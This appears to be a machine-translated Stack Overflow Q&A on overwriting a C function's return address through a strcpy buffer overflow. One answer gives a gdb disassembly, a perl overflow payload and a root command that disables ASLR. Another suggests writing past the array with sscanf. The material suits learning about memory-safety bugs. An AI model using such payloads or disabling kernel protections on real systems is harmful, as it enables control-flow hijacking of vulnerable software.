C Code, как изменить адрес возврата в коде?

Question

Я только что написал код C, который находится ниже:

#include<stdio.h>
#include<string.h>


void func(char *str)
{
        char buffer[24];
        int *ret;
        strcpy(buffer,str);
}

int main(int argc,char **argv)
{
        int x;
        x=0;
        func(argv[1]);
        x=1;
        printf("\nx is 1\n");
        printf("\nx is 0\n\n");
}

Можете ли вы предложить мне, как пропустить строку printf ("\ nx is 1 \ n"); .Ранее подсказка, которую я получил, состояла в том, чтобы изменить ret переменную, которая является адресом возврата функции func .

Можете ли вы предложить мне каккак изменить адрес возврата в вышеуказанной программе, чтобы printf ("\ nx is 1 \ n"); был пропущен.

Я отправил этот вопрос, потому что я незнаете, как изменить обратный адрес.

Было бы здорово, если бы вы мне помогли.

Спасибо

Answer 1

Насколько я понимаю, вы хотите, чтобы код выполнил инструкцию x=1;, а затем перепрыгнул через следующий printf, чтобы он напечатал только x is 0. Нет способа сделать это.

Однако, что можно сделать, это заставить func () стереть свой собственный обратный адрес, чтобы код перешел прямо к printf("\nx is 0\n\n");. Это значит и перепрыгнуть x=1;.

Это возможно только потому, что вы отправляете в func () все, что пропущено через строку cmd, и копируете прямо в буфер фиксированного размера. Если строка, которую вы пытаетесь скопировать, больше выделенного буфера, вы, вероятно, в конечном итоге повредите стек и, возможно, перезапишите адрес возврата функции.

Есть замечательные книги, такие как , эта на эту тему, и я рекомендую вам прочитать их.

Загружая ваше приложение на gdb и разбирая основную функцию, вы увидите нечто похожее на это:

(gdb) disas main
Dump of assembler code for function main:
0x0804840e <main+0>:    lea    0x4(%esp),%ecx
0x08048412 <main+4>:    and    $0xfffffff0,%esp
0x08048415 <main+7>:    pushl  -0x4(%ecx)
0x08048418 <main+10>:   push   %ebp
0x08048419 <main+11>:   mov    %esp,%ebp
0x0804841b <main+13>:   push   %ecx
0x0804841c <main+14>:   sub    $0x24,%esp
0x0804841f <main+17>:   movl   $0x0,-0x8(%ebp)
0x08048426 <main+24>:   mov    0x4(%ecx),%eax
0x08048429 <main+27>:   add    $0x4,%eax
0x0804842c <main+30>:   mov    (%eax),%eax
0x0804842e <main+32>:   mov    %eax,(%esp)
0x08048431 <main+35>:   call   0x80483f4 <func>     // obvious call to func
0x08048436 <main+40>:   movl   $0x1,-0x8(%ebp)      // x = 1;
0x0804843d <main+47>:   movl   $0x8048520,(%esp)    // pushing "x is 1" to the stack
0x08048444 <main+54>:   call   0x804832c <puts@plt> // 1st printf call
0x08048449 <main+59>:   movl   $0x8048528,(%esp)    // pushing "x is 0" to the stack
0x08048450 <main+66>:   call   0x804832c <puts@plt> // 2nd printf call
0x08048455 <main+71>:   add    $0x24,%esp
0x08048458 <main+74>:   pop    %ecx
0x08048459 <main+75>:   pop    %ebp
0x0804845a <main+76>:   lea    -0x4(%ecx),%esp
0x0804845d <main+79>:   ret    
End of assembler dump.

Важно, что вы заметили, что подготовка ко второму printf звонку начинается по адресу 0x08048449. Чтобы переопределить исходный адрес возврата func() и сделать так, чтобы он перешел на 0x08048449, вам нужно будет написать больше, чем char buffer[24];. В этом тесте я использовал char buffer[6]; для простоты.

В то время как в GDB , если я выполню:

run `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`

это успешно переопределит буфер и заменит адрес возврата на адрес, к которому я хочу перейти:

Starting program: /home/karl/workspace/stack/fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`

x is 0


Program exited with code 011.
(gdb)

Я не буду объяснять каждый шаг на этом пути, потому что другие уже сделали это намного лучше, но если вы хотите воспроизвести это поведение непосредственно из строки cmd, вы можете выполнить следующее:

./fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`

Имейте в виду, что адреса памяти, которые gdb сообщает вам, вероятно, будут отличаться от тех, которые я получил.

Примечание : чтобы эта техника работала, вам сначала нужно отключить защиту ядра. Но только если команда ниже сообщает о чем-то отличном от 0:

cat /proc/sys/kernel/randomize_va_space

, чтобы отключить его, вам потребуется доступ суперпользователя:

echo 0 > /proc/sys/kernel/randomize_va_space

Answer 2

Адрес возврата из func находится в стеке, рядом с его локальными переменными (одна из них buffer).Если вы хотите перезаписать адрес возврата, вы должны написать после конца массива (возможно, до buffer[24...27], но я, вероятно, ошибаюсь - может быть buffer[28...31] или даже buffer[24...31], если у вас 64-битная система),Я предлагаю использовать отладчик, чтобы выяснить точные адреса.

Кстати, избавьтесь от переменной ret - вы ничего не добьетесь, имея ее, и это может привести к путанице в ваших вычислениях.что этот «эксплойт переполнения буфера» немного сложен для отладки, потому что strcpy останавливает копирование, когда встречается нулевой байт, и адрес, который вы хотите записать в стек, вероятно, содержит такой байт.Это будет проще сделать так:

void func(char *str)
{
    char buffer[24];
    sscanf(str, "%x", &buffer[24]); // replace the 24 by 28, 32 or whatever is right
}

И дать адрес в командной строке в виде шестнадцатеричной строки.Это делает его более понятным и упрощает отладку.

Answer 3

Это невозможно - было бы возможно, если бы вы знали компилятор и как он работает, сгенерированный ассемблерный код, используемые библиотеки, архитектуру, процессор, системную среду и номера лото завтрашнего дня - и еслиу тебя было это знание, ты был бы достаточно умен, чтобы не спрашивать.Единственный сценарий, в котором это имеет смысл, - это когда кто-то пытается что-то напасть, и не ожидайте, что кто-то захочет вам в этом помочь.